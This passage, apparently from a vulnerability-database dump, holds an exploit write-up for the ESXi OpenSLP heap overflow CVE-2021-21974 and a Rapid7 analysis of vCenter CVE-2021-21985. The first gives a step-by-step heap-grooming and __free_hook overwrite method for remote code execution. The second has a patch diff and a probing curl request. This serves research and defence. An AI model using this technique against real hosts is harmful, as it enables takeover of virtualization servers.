'send-buffer' for this specific connection, and pointers to\n'slpd-socket' object created from prior and future established connections.\nThe size of this object is fixed at 0xd0, and cannot be changed.\n\n```c\n// https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h/** Structure representing a socket */typedef struct _SLPDSocket{ SLPListItem listitem; sockfd_t fd; time_t age; /* in seconds -- in unicast dgram sockets, this also drives the resend logic */ int state; int can_send_mcast; /*Instead of allocating outgoing sockets to for sending multicast messages, slpd uses incoming unicast sockets that were bound to the network interface. Unicast sockets are used because some stacks use the multicast address as the source address if the socket was bound to the multicast address. Since we don't want to send mcast out of all the unicast sockets, this flag is used*/ /* addrs related to the socket */ struct sockaddr_storage localaddr; struct sockaddr_storage peeraddr; struct sockaddr_storage mcastaddr; /* Incoming socket stuff */ SLPBuffer recvbuf; SLPBuffer sendbuf; /* Outgoing socket stuff */ int reconns; /*For stream sockets, this drives reconnect. For unicast dgram sockets, this drives resend*/ SLPList sendlist;#if HAVE_POLL int fdsetnr;#endif} SLPDSocket;\n```\n\n_SLPDSocket structure from OpenSLP source code\n\n\n\n![]()\n\nmemory layout for a _SLPDSocket object\n\n## _SLPBuffer\n\nAll SLP message types received from the server will create at least two\nSLPBuffer objects. One is called 'recv-buffer', which stores the data received\nby the server from the client. Since I can control the size of the data I send\nfrom the client, I can control the size of the 'recv-buffer'. The other\nSLPBuffer object is called 'send-buffer'. This buffer stores the data that\nwill be send from the server to client. The 'send-buffer' have a fixed size of\n0x598 and I cannot control its size. Furthermore, the SLPBuffer have meta-data\nproperties that points to the starting, current, and ending position of said\ndata.\n\n```c\n//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/common/slp_buffer.h/** Buffer object holds SLP messages. */typedef struct _SLPBuffer{ SLPListItem listitem; /*!< @brief Allows SLPBuffers to be linked. */ size_t allocated; /*!< @brief Allocated size of buffer. */ uint8_t * start; /*!< @brief Points to start of space. */ uint8_t * curpos; /*!< @brief @p start < @c @p curpos < @p end */ uint8_t * end; /*!< @brief Points to buffer limit. */} * SLPBuffer;\n```\n\n\n\n_SLPBuffer from OpenSLP source code\n\n\n\n![]()\n\nmemory layout for a _SLPBuffer object\n\n## SLP Socket State\n\nThe SLP Socket State defines the status for a particular connection. The state\nvalue is set in the _SLPSocket object. A connection will either be calling\n'recv' or 'send' depending on the state of the socket.\n\n```c\n//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h\n/* Values representing a type or state of a socket */\n#define SOCKET_PENDING_IO 100\n#define SOCKET_LISTEN 0\n#define SOCKET_CLOSE 1\n#define DATAGRAM_UNICAST 2\n#define DATAGRAM_MULTICAST 3\n#define DATAGRAM_BROADCAST 4\n#define STREAM_CONNECT_IDLE 5\n#define STREAM_CONNECT_BLOCK 6 + SOCKET_PENDING_IO\n#define STREAM_CONNECT_CLOSE 7 + SOCKET_PENDING_IO\n#define STREAM_READ 8 + SOCKET_PENDING_IO\n#define STREAM_READ_FIRST 9 + SOCKET_PENDING_IO\n#define STREAM_WRITE 10 + SOCKET_PENDING_IO\n#define STREAM_WRITE_FIRST 11 + SOCKET_PENDING_IO\n#define STREAM_WRITE_WAIT 12 + SOCKET_PENDING_IO\n````\n\nSocket states constants defined in OpenSLP source code\n\nIt is important to understand the properties of _SLPSocket, _SLPBuffer and\nSocket States because the exploitation process requires modifying those\nvalues.\n\n# Objectives, Expectations and Limitations\n\nThis section goes over objectives required to land a successful exploitation.\n\n## Objective 1\n\nAchieve remote code execution by leveraging the heap overflow to overwrite the\n'__free_hook' to point to shellcode or ROP chain.\n\n## Expectation 1\n\nIf I can overwrite the 'position' pointers in a _SLPBuffer 'recv-buffer'\nobject, I can force incoming data to the server to be written to arbitrary\nmemory location.\n\n## Objective 2\n\nIn order to know the address of '__free_hook', I have to leak an address\nreferencing the libc library.\n\n## Expectation 2\n\nIf I can overwrite the 'position' pointers in a _SLPBuffer 'send-buffer'\nobject, I can force outgoing data from the server to read from arbitrary\nmemory location.\n\nNow that I defined goals and objectives, I have to identify any limitations\nwith the heap overflow vector and memory allocation in general.\n\n## Limitations\n\n 1. 'URL' data stored in the \"Directory Agent Advertisement's URL\" object cannot contain null bytes (due to the 'strstr' function). This limitation prevents me from directly overwriting meta-data within an adjacent '_SLPDSocket' or '_SLPBuffer' object because I would have to supply an invalid size value for the objects' heap header before reaching those properties.\n 2. The 'slpd' binary allocates '_SLPDSocket' and '_SLPBuffer' objects with 'calloc'. The 'calloc' call will zero out the allocated memory slot. This limitation removes all past data of a memory slot which could contain interesting pointers or stack addresses. This looks like a show stopper because if I was to overwrite a 'position' pointer in a _SLPBuffer, I would need to know a valid address value. Since I don't know such value, the next best thing I can do is partially overwrite a 'position' pointer to at least get me in a valid address range that could be meaningful. With 'calloc' zeroing everything out, I lose that opportunity.\n\nFortunately, not all is lost. As shared in Lucas' blog post, I can still get\naround the limitations.\n\n## Limitations Bypass\n\n 1. Use the heap overflow to partially overwrite the adjacent free memory chunk's size to extend it. By extending the free chunk, I can have it position to overlap with its neighbor '_SLPDSocket' or '_SLPBuffer' object. When I allocate memory that occupies the extended free space, I can overwrite the object's properties.\n 2. The 'calloc' call will retain past data of a memory slot if it was previously marked as '[IS_MAPPED](https://github.com/apc-llc/glibc-2.17/blob/master/malloc/malloc.c#L3189)' when it was still freed. The key thing is the 'calloc' call must request a chunk size that is an **exact size** as the freed slot with 'IS_MAPPED' flag enabled to preserve its old data. If a 'IS_MAPPED' freed chunk is splitted up by a 'calloc' request, the 'calloc' will service a chunk without the 'IS_MAPPED' flag and zero out the slot's content.\n\nThere is still one more catch. Even if I can mark arbitrary position to store\nor read data for the _SLPBuffer, the 'slpd' binary will not comply unless\nassociated socket state is set to the proper status. Therefore, the heap\noverflow will also have to overwrite the associated _SLPDSocket object's meta-\ndata in order to get arbitrary read and write primitive to work.\n\n# Heap Grooming\n\nThis sections goes over the heap grooming strategy to achieve the following:\n\n\n\n![]()\n\n## The Building Blocks\n\nBefore I go over the heap grooming design, I want to say a few words about the\npurpose of the SLP messages mentioned earlier in fitting into the exploitation\nprocess.\n\n **service request** -- primarily use for creating a consecutive heap layout\nand holes.\n\n **directory agent advertisement** -- use to trigger the heap overflow vector\nto overwrite into the next neighbor memory block.\n\n **service registration** -- store user controlled data into the memory\ndatabase which will be retrieved through the 'attribute request' message. This\nmessage is solely to set up 'attribute request' and is not used for the\npurpose of heap grooming.\n\n **attribute request** -- pull user controlled data from the memory database.\nIts purpose is to create a 'marker' that can be used to identify current\nposition during the information leak stage. Also, the dynamic memory use to\nstore the user controlled data can be a good stack pivot spot with complete\nuser controllable content.\n\n## Overwrite _SLPBuffer 'send-buffer' object (Arbitrary Read Primitive)\n\n\n\n(1). Client A, B, and C create connections to server. Client A sends 'service\nrequest' message. Client D creates connection and sends 'service request'\nmessage. Client B sends 'service request' message.\n\n\n\n(2). Close client D's connection.\n\n\n\n(3). Client E creates a connection and sends an 'attribute request' message.\n\n\n\n(4). Client E's 'send-buffer' will go through reallocation because the data is\ntoo large.\n\n\n\n(5). Client E's connection is still intact and not closed, however, the\n'message' object is now freed.\n\n\n\n(6). Client G and H creates connection to server. Client C will now send a\n'service request' to fill the hole left by Client E's 'send-buffer'\nreallocation and freed 'message'.\n\n\n\n(7). Close client B's connection.\n\n\n\n(8). Client F creates connection to server and sends a 'directory agent\nadvertisement' message. This leaves a freed 0x100 size chunk right after the\n'URL' object for extension and overlapping.\n\n\n\n(9). The 'URL' object extended its neighboring freed chunk size from 0x100 to\n0x120. The server will free the allocated objects initiated by client F. It\ncan be observed that all objects related to client F are freed and\nconsolidated. The 'URL' object is freed as well, but because its size fits in\nthe fast-bin, the 'URL' object did not get coalesced.\n\n\n\n(10). Client G sends a 'service request' message. The first-fit algorithm will\nassign the extended free block to client G's 'recv-buffer' object. This object\noverlaps with client E's 'send-buffer', which can now overwrite the 'position'\npointers in it.\n\n\n\n(11). Client J creates connection to server and sends a 'service request'\nmessage. Its purpose is to fill up the hole left by client F's 'directory\nagent advertisement' message.\n\n\n\n(12). Close client A's connection.\n\n\n\n(13). Client I creates connection to server and sends a 'directory agent\nadvertisement' message.\n\n\n\n(14). The 'URL' object extended its neighboring freed chunk size from 0x100 to\n0x140. The server will free the allocated objects initiated by client I. It\ncan be observed that all objects related to client I are freed and\nconsolidated. The 'URL' object is freed as well, but because its size fits in\nthe fast-bin, the 'URL' object did not get coalesced.\n\n\n\n(15). Client H's sends a 'service request' message. The first-fit algorithm\nwill assign the extended free block to client H's 'recv-buffer' object. This\nobject overlaps with client E's 'slpd-socket', which can now overwrite the\nproperties in it.\n\n## Overwrite _SLPBuffer 'recv-buffer' object (Arbitrary Write Primitive)\n\n\n\n(1). Client A creates connection to server and sends 'service request'\nmessage. Client B creates connection only. Client C creates connection and\nsends 'service request' message. Client B now sends 'service request' message.\nClient D and E create connections to server.\n\n\n\n(2). Close client C's connection.\n\n\n\n(3). Client F creates connection to server and sends a 'directory agent\nadvertisement' message. This leaves a freed 0x100 size chunk right after the\n'URL' object for extension and overlapping.\n\n\n\n(4). The 'URL' object extended its neighboring freed chunk size from 0x100 to\n0x140. The server will free the allocated objects initiated by client F. It\ncan be observed that all objects related to client F are freed and\nconsolidated. The 'URL' object is freed as well, but because its size fits in\nthe fast-bin, the 'URL' object did not get coalesced.\n\n\n\n(5). Client E sends a 'service request' message. The first-fit algorithm will\nassign the extended free block to client E's 'recv-buffer' object. This object\noverlaps with client B's 'recv-buffer', which can now overwrite the 'position'\npointers in it.\n\n\n\n(6). Client G creates connection to server and sends a 'service request'\nmessage. Its purpose is to fill up the hole left by client F's 'directory\nagent advertisement' message.\n\n\n\n(7). Close client A's connection.\n\n\n\n(8). Client H creates connection to server and sends a 'directory agent\nadvertisement' message. This leaves a freed 0x100 size chunk right after the\n'URL' object for extension and overlapping.\n\n\n\n(9). The 'URL' object extends its neighboring freed chunk from 0x100 to 0x140.\nThe server will free the allocated object initiated by client H. It can be\nobserved that all objects related to client H are freed and consolidated. The\n'URL' object is freed as well, but because its size fits in the fast-bin, the\n'URL' object did not get coalesced.\n\n\n\n(10). Client D sends a 'service request' message. The first-fit algorithm will\nassign the extended free block to client D's 'recv-buffer' object. This object\noverlaps with client B's 'slpd-socket', which can now overwrite the properties\nin it.\n\nThe above visual heap layouts is created with\n[villoc](https://github.com/wapiflapi/villoc).\n\n# Exploitation Strategy Walkthrough\n\nIt is best to look at the [exploit code](https://github.com/straightblast/My-\nPoC-Exploits/blob/master/CVE-2021-21974.py) along with following the below\nnarration to understand how the exploit works.\n\n 1. Client 1 sends a 'directory agent advertisement' request to prepare for any unexpected memory allocation that may happen for this particular request. I observed the request makes additional memory allocation when the 'slpd' daemon is run on startup but does not when running it through /etc/init.d/slpd start. Any unexpected memory allocation would eventually be freed and end up on the freelist. The assumptions is these unique freed slots will be used again by future 'directory agent advertisement' messages as long as I do not explicitly allocate memory that would hijack them.\n 2. Clients 2-5 makes a 'service request' with each receiving buffer having a size of 0x40. This is to fill up some initial freed slots that exists on the freelist. If i don't occupy these freed slot, it would hijack future 'URL' memory allocation for future 'directory agent advertisement' message and ruin the heap grooming.\n 3. Clients 6-10 sets up client 7 to send the 'service registration' message to the server. The server only accepts 'service registration' message originating from localhost, therefore client 7's 'slpd-socket' needs to be overwritten to have its IP address updated. Once the message is sent, client 7's socket object will be updated again to hold the listening file descriptor to handle future incoming connection. If this step is skipped, future clients cannot establish connection with the server.\n 4. Clients 11-21 sets up the arbitrary read primitive by overwriting client 15's 'send-buffer' position pointers. Since I have no knowledge of what addresses to leak in the first place, I will perform a partial overwrite of the last two significant bytes of the 'start' position pointer with null values. This requires setting up the extended free chunk to be marked 'IS_MAPPED' to avoid getting zeroed out by the 'calloc' call. The 'send-buffer' that gets updated belongs to the 'attribute request' message. As I have no visibility to how much data will be leaked, I can get a ballpark idea of where the leak is at by including a marker value as part of the 'service registration' message noted in step 3. If the leaked content contains the marker, I know it is leaking data from the 'attribute request' 'send-buffer' object. This tells me it is about time to stop reading from the leak. Lastly, I have to update client 15's 'slpd-socket' to have its state to be in 'STREAM_WRITE', which will makes the 'send' call to my client.\n 5. I was able to collect heap addresses and libc addresses from the leak which I can derive everything else. My goal is to overwrite libc's __free_hook with libc's system address. I will need a gadget to position my stack at a location that won't be subject to alteration by the application. I found a gadget from libc-2.17.so that will stack lift the stack address by 0x100.\n 6. With the collected libc address, I can calculate the libc environment address which stores the stack address. I use clients 22-31 to setup the arbitrary read primitive to leak the stack address. I have to update client 25's file descriptor in the 'slpd-socket' to hold the listening file descriptor.\n 7. Clients 32-40 sets up the arbitrary write primitive. This requires overwriting client 33's 'recv-buffer' object's position pointers. It first stores shell commands into client 15's 'send-buffer' object, which is a large slab of space under my control. It then writes the libc's system address, a fake return address, and the address of the shell command onto the predicted stack location after stack lifting is performed. Afterwards, it overwrites libc's __free_hook to hold the stack lifting gadget address. Lastly, each arbitrary write requires updating the corresponding 'slpd-socket' object state to 'STREAM_READ'. If this step is skipped, the server will not accept the overwritten values for the position pointers.\n 8. The desired shell commands will be executed once all the above steps are completed.\n\n# Final Remark\n\nI enjoyed implementing this exploit very much and learned a few things when\nwriting it. One of the biggest thing I learn is never make an assumption and\nshould always test an idea out. When I was trying to get the leaking data part\nof the exploit code to work, I was preparing to implement it the way Lucas\ndescribed in his blog, which seems slightly complicated. I was curious as to\nwhy I can't just flip the socket object's state to 'STREAM_WRITE' which send\nthe data back to me. After reviewing the OpenSLP code, I understand the\nproblem and see why Lucas came up with his particular solution. Nevertheless,\nI still wanted to see what happens if I just flip the state on the socket\nobject, and to my disbelief, the daemon did send me the leaked data\nimmediately without going through the additional hurdles. Another take away is\nwhen doing any heap grooming design, it is best to work it backward from how I\nwant the heap to look in its finished form, and back track the layout to the\nbeginning.\n\nThe PoC should work out of the box against VMware ESXi 6.7.0 build-14320388,\nwhich is the trial version. I was able to get it to work 14 out of 15 tries.", "cvss3": {}, "published": "2021-05-25T00:00:00", "type": "seebug", "title": "ESXi OpenSLP\u5806\u6ea2\u51fa\u6f0f\u6d1e\uff08CVE-2021-21974\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3992", "CVE-2021-21974"], "modified": "2021-05-25T00:00:00", "id": "SSV:99259", "href": "https://www.seebug.org/vuldb/ssvid-99259", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-24T09:59:06", "description": "Rapid7\n\n[May 26, 2021 5:34pm UTC (1 day ago)](https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?#rapid7-analysis)\u2022 Last updated May 27, 2021 6:39pm UTC (7 hours ago)\n\n\n\n###### Technical Analysis\n\n**Threat status:** Impending threat\n**Attacker utility:** Network infrastructure compromise\n\n## Description\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](https://www.vmware.com/security/advisories/VMSA-2021-0010.html), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server and VMware Cloud Foundation. The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nVMware has released a [blog post](https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html) and a [supplemental FAQ](https://core.vmware.com/resource/vmsa-2021-0010-faq) for VMSA-2021-0010, which highlights the elevated threat of ransomware, including against organizations running vCenter Server. As of May 26, 2021, there are no reports of exploitation in the wild\u2014this, however, is unlikely to last.\n\n## Affected products\n\n- vCenter Server 6.5\n- vCenter Server 6.7\n- vCenter Server 7.0\n- Cloud Foundation (vCenter Server) 3.x\n- Cloud Foundation (vCenter Server) 4.x\n\nFor information on fixed versions, see the matrix of affected products and updates in VMware\u2019s advisory: https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n\n## Rapid7 analysis\n\nAs with [previous vCenter Server vulnerabilities](https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis), we classify CVE-2021-21985 as an impending threat: It is a high-value attack target for both advanced and commodity threat actors, and we expect exploitation to occur quickly and at scale. As of May 26, 2021, Rapid7 Labs identified roughly 6,000 vCenter Server instances exposed to the public internet.\n\n### Patch\n\nThe following changes add authentication to the Virtual SAN Health Check plugin\u2019s `/rest/*` endpoints:\n\n```xml\n--- a/unpatched/src/h5-vsan-context.jar/WEB-INF/web.xml\n+++ b/patched/src/h5-vsan-context.jar/WEB-INF/web.xml\n@@ -5,6 +5,21 @@\n\n <display-name>h5-vsan-service</display-name>\n\n+ <context-param>\n+ <param-name>contextConfigLocation</param-name>\n+ <param-value>/WEB-INF/spring/bundle-context.xml</param-value>\n+ </context-param>\n+\n+ <!-- The application context needs to be OSGI-enabled in order to look up services -->\n+ <context-param>\n+ <param-name>contextClass</param-name>\n+ <param-value>org.eclipse.virgo.web.dm.ServerOsgiBundleXmlWebApplicationContext</param-value>\n+ </context-param>\n+\n+ <listener>\n+ <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>\n+ </listener>\n+\n <!-- Processes application requests -->\n <servlet>\n <servlet-name>springServlet</servlet-name>\n@@ -12,7 +27,7 @@\n\n <init-param>\n <param-name>contextConfigLocation</param-name>\n- <param-value>/WEB-INF/spring/bundle-context.xml</param-value>\n+ <param-value>/WEB-INF/spring/empy-context.xml</param-value>\n </init-param>\n\n <!-- The application context needs to be OSGI-enabled in order to look up services -->\n@@ -40,4 +55,14 @@\n <url-pattern>/*</url-pattern>\n </filter-mapping>\n\n+ <filter>\n+ <filter-name>authenticationFilter</filter-name>\n+ <filter-class>com.vmware.vsan.client.services.AuthenticationFilter</filter-class>\n+ </filter>\n+\n+ <filter-mapping>\n+ <filter-name>authenticationFilter</filter-name>\n+ <url-pattern>/rest/*</url-pattern>\n+ </filter-mapping>\n+\n </web-app>\n```\n\n```java\npackage com.vmware.vsan.client.services;\n\nimport com.vmware.vise.usersession.UserSessionService;\nimport java.io.IOException;\nimport javax.servlet.Filter;\nimport javax.servlet.FilterChain;\nimport javax.servlet.FilterConfig;\nimport javax.servlet.ServletException;\nimport javax.servlet.ServletRequest;\nimport javax.servlet.ServletResponse;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.beans.factory.config.AutowireCapableBeanFactory;\nimport org.springframework.web.context.WebApplicationContext;\nimport org.springframework.web.context.support.WebApplicationContextUtils;\n\npublic class AuthenticationFilter implements Filter {\n private static final Logger logger = LoggerFactory.getLogger(AuthenticationFilter.class);\n\n @Autowired\n private UserSessionService userSessionService;\n\n public void init(FilterConfig filterConfig) {\n WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(filterConfig.getServletContext());\n AutowireCapableBeanFactory factory = context.getAutowireCapableBeanFactory();\n factory.autowireBean(this);\n }\n\n public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain) throws IOException, ServletException {\n if (this.userSessionService.getUserSession() == null) {\n HttpServletRequest httpRequest = (HttpServletRequest)request;\n HttpServletResponse httpResponse = (HttpServletResponse)response;\n logger.warn(String.format(\"Null session detected for a %s request to %s\", new Object[] { httpRequest.getMethod(), httpRequest.getRequestURL() }));\n httpResponse.setStatus(401);\n return;\n }\n filterChain.doFilter(request, response);\n }\n\n public void destroy() {}\n}\n```\n\nFurthermore, additional input validation was added to the `com.vmware.vsan.client.services.ProxygenController` class:\n\n```java\n--- a/unpatched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\n+++ b/patched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\n@@ -1,151 +1,152 @@\n package com.vmware.vsan.client.services;\n\n import com.google.common.collect.ImmutableMap;\n import com.google.gson.Gson;\n+import com.vmware.proxygen.ts.TsService;\n import com.vmware.vim.binding.vmodl.LocalizableMessage;\n import com.vmware.vim.binding.vmodl.MethodFault;\n import com.vmware.vim.binding.vmodl.RuntimeFault;\n import com.vmware.vsphere.client.vsan.util.MessageBundle;\n import java.lang.reflect.InvocationTargetException;\n import java.lang.reflect.Method;\n import java.util.HashMap;\n import java.util.List;\n import java.util.Map;\n import org.apache.commons.lang.StringUtils;\n import org.slf4j.Logger;\n import org.slf4j.LoggerFactory;\n import org.springframework.beans.BeansException;\n import org.springframework.beans.factory.BeanFactory;\n import org.springframework.beans.factory.annotation.Autowired;\n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.PathVariable;\n import org.springframework.web.bind.annotation.RequestBody;\n import org.springframework.web.bind.annotation.RequestMapping;\n import org.springframework.web.bind.annotation.RequestMethod;\n import org.springframework.web.bind.annotation.RequestParam;\n import org.springframework.web.bind.annotation.ResponseBody;\n import org.springframework.web.multipart.MultipartFile;\n\n @Controller\n @RequestMapping({\"/proxy\"})\n public class ProxygenController extends RestControllerBase {\n private static final Logger logger = LoggerFactory.getLogger(ProxygenController.class);\n\n @Autowired\n private BeanFactory beanFactory;\n\n @Autowired\n private MessageBundle messages;\n\n @RequestMapping(value = {\"/service/{beanIdOrClassName}/{methodName}\"}, method = {RequestMethod.POST}, consumes = {\"application/json\"}, produces = {\"application/json\"})\n @ResponseBody\n public Object invokeServiceWithJson(@PathVariable(\"beanIdOrClassName\") String beanIdOrClassName, @PathVariable(\"methodName\") String methodName, @RequestBody Map<String, Object> body) throws Exception {\n List<Object> rawData = null;\n try {\n rawData = (List<Object>)body.get(\"methodInput\");\n } catch (Exception e) {\n logger.error(\"service method failed to extract input data\", e);\n return handleException(e);\n }\n return invokeService(beanIdOrClassName, methodName, null, rawData);\n }\n\n @RequestMapping(value = {\"/service/{beanIdOrClassName}/{methodName}\"}, method = {RequestMethod.POST}, consumes = {\"multipart/form-data\"}, produces = {\"application/json\"})\n @ResponseBody\n public Object invokeServiceWithMultipartFormData(@PathVariable(\"beanIdOrClassName\") String beanIdOrClassName, @PathVariable(\"methodName\") String methodName, @RequestParam(\"file\") MultipartFile[] files, @RequestParam(\"methodInput\") String rawData) throws Exception {\n List<Object> data = null;\n try {\n Gson gson = new Gson();\n data = (List<Object>)gson.fromJson(rawData, List.class);\n } catch (Exception e) {\n logger.error(\"service method failed to extract input data\", e);\n return handleException(e);\n }\n return invokeService(beanIdOrClassName, methodName, files, data);\n }\n\n private Object invokeService(String beanIdOrClassName, String methodName, MultipartFile[] files, List<Object> data) throws Exception {\n try {\n Object bean = null;\n String beanName = null;\n Class<?> beanClass = null;\n try {\n beanClass = Class.forName(beanIdOrClassName);\n beanName = StringUtils.uncapitalize(beanClass.getSimpleName());\n } catch (ClassNotFoundException classNotFoundException) {\n beanName = beanIdOrClassName;\n }\n try {\n bean = this.beanFactory.getBean(beanName);\n } catch (BeansException beansException) {\n bean = this.beanFactory.getBean(beanClass);\n }\n byte b;\n int i;\n Method[] arrayOfMethod;\n for (i = (arrayOfMethod = bean.getClass().getMethods()).length, b = 0; b < i; ) {\n Method method = arrayOfMethod[b];\n- if (!method.getName().equals(methodName)) {\n+ if (!method.getName().equals(methodName) || !method.isAnnotationPresent((Class)TsService.class)) {\n b++;\n continue;\n }\n ProxygenSerializer serializer = new ProxygenSerializer();\n Object[] methodInput = serializer.deserializeMethodInput(data, files, method);\n Object result = method.invoke(bean, methodInput);\n Map<String, Object> map = new HashMap<>();\n map.put(\"result\", serializer.serialize(result));\n return map;\n }\n } catch (Exception e) {\n logger.error(\"service method failed to invoke\", e);\n return handleException(e);\n }\n logger.error(\"service method not found: \" + methodName + \" @ \" + beanIdOrClassName);\n return handleException(null);\n }\n\n private Object handleException(Throwable t) {\n if (t instanceof InvocationTargetException)\n return handleException(((InvocationTargetException)t).getTargetException());\n if (t instanceof java.util.concurrent.ExecutionException && t.getCause() != t)\n return handleException(t.getCause());\n if (t instanceof com.vmware.vise.data.query.DataException && t.getCause() != t)\n return handleException(t.getCause());\n if (t instanceof com.vmware.vim.vmomi.client.common.UnexpectedStatusCodeException)\n return ImmutableMap.of(\"error\", this.messages.string(\"util.dataservice.notRespondingFault\"));\n if (t instanceof VsanUiLocalizableException) {\n VsanUiLocalizableException localizableException = (VsanUiLocalizableException)t;\n return ImmutableMap.of(\"error\", this.messages.string(\n localizableException.getErrorKey(), localizableException.getParams()));\n }\n LocalizableMessage[] faultMessage = null;\n String vmodlMessage = null;\n if (t instanceof MethodFault) {\n faultMessage = ((MethodFault)t).getFaultMessage();\n vmodlMessage = ((MethodFault)t).getMessage();\n } else if (t instanceof RuntimeFault) {\n faultMessage = ((RuntimeFault)t).getFaultMessage();\n vmodlMessage = ((RuntimeFault)t).getMessage();\n }\n if (faultMessage != null) {\n byte b;\n int i;\n LocalizableMessage[] arrayOfLocalizableMessage;\n for (i = (arrayOfLocalizableMessage = faultMessage).length, b = 0; b < i; ) {\n LocalizableMessage localizable = arrayOfLocalizableMessage[b];\n if (localizable.getMessage() != null && !localizable.getMessage().isEmpty())\n return ImmutableMap.of(\"error\", localizeFault(localizable.getMessage()));\n if (localizable.getKey() != null && !localizable.getKey().isEmpty())\n return ImmutableMap.of(\"error\", localizeFault(localizable.getKey()));\n b++;\n }\n }\n if (StringUtils.isNotBlank(vmodlMessage))\n return ImmutableMap.of(\"error\", vmodlMessage);\n return ImmutableMap.of(\"error\", this.messages.string(\"vsan.common.generic.error\"));\n }\n\n private String localizeFault(String key) {\n return key;\n }\n }\n```\n\nWhich appears to be vulnerable to Java [unsafe reflection](https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection):\n\n```\nunpatched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\nseverity:warning rule:java.lang.security.audit.unsafe-reflection.unsafe-reflection: If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke,\nthe potential exists for the attacker to create control flow paths through the application\nthat were not intended by the application developers.\nThis attack vector may allow the attacker to bypass authentication or access control checks\nor otherwise cause the application to behave in an unexpected manner.\n\n73: beanClass = Class.forName(beanIdOrClassName);\n```\n\n### PoC\n\nThe affected endpoint is `/ui/h5-vsan/rest/proxy/service`, which responds to `POST` request:\n\n```shell\nwvu@kharak:~$ curl -kv https://[redacted]/ui/h5-vsan/rest/proxy/service/CLASS/METHOD -H \"Content-Type: application/json\" -d {}\n* Trying [redacted]...\n* TCP_NODELAY set\n* Connected to [redacted] ([redacted]) port 443 (#0)\n* ALPN, offering h2\n* ALPN, offering http/1.1\n* successfully set certificate verify locations:\n* CAfile: /etc/ssl/cert.pem\n CApath: none\n* TLSv1.2 (OUT), TLS handshake, Client hello (1):\n* TLSv1.2 (IN), TLS handshake, Server hello (2):\n* TLSv1.2 (IN), TLS handshake, Certificate (11):\n* TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n* TLSv1.2 (IN), TLS handshake, Server finished (14):\n* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n* TLSv1.2 (OUT), TLS handshake, Finished (20):\n* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n* TLSv1.2 (IN), TLS handshake, Finished (20):\n* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n* ALPN, server did not agree to a protocol\n* Server certificate:\n* subject: CN=[redacted]; C=US\n* start date: Apr 20 21:05:53 2020 GMT\n* expire date: Apr 15 21:05:51 2030 GMT\n* issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=vcenter-6-7; OU=VMware Engineering\n* SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n> POST /ui/h5-vsan/rest/proxy/service/CLASS/METHOD HTTP/1.1\n> Host: [redacted]\n> User-Agent: curl/7.64.1\n> Accept: */*\n> Content-Type: application/json\n> Content-Length: 2\n>\n* upload completely sent off: 2 out of 2 bytes\n< HTTP/1.1 200\n< Set-Cookie: JSESSIONID=AF396E0FF5219A869AD53ABF34B7B0AF; Path=/ui/h5-vsan; HttpOnly\n< Content-Type: application/json;charset=UTF-8\n< Transfer-Encoding: chunked\n< Date: Thu, 27 May 2021 17:32:13 GMT\n< Server: Anonymous\n<\n* Connection #0 to host [redacted] left intact\n{\"error\":\"CLASS cannot be found by com.vmware.vsphere.client.h5vsan-6.7.0.10000-com.vmware.vsan.client.h5-vsan-service_6.5.0.8170065-storage-main in KernelBundleClassLoader: [bundle=com.vmware.vsphere.client.h5vsan-6.7.0.10000-com.vmware.vsan.client.h5-vsan-service_6.5.0.8170065-storage-main]\"}* Closing connection 0\nwvu@kharak:~$\n```\n\nNote that this PoC **does not** achieve RCE on its own.\n\n### IOCs\n\n> The default log location for Virtual SAN health check plugin is `/var/log/vmware/vsan-health`. And user can change it by modifying the configuration item \u201c`logdir`\u201d in the configuration file under `/usr/lib/vmware-vpx/vsan-health`. On the vCenter Server for Windows, the file is located in `%VMWARE_LOG_DIR%\\vsan-health`. **No security related information is logged in the log file.**\n\nhttps://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/products/products/vsan/vmw-gdl-vsan-health-check.pdf\n\n> The vCenter Server logs are placed in a different directory on disk depending on vCenter Server version and the deployed platform:\n>\n> - vCenter Server 6.x and higher versions on Windows server: `C:\\ProgramData\\VMware\\vCenterServer\\Logs\\`\n> - vCenter Server Appliance 6.x: `/var/log/vmware/`\n> - vCenter Server Appliance 6.x flash: 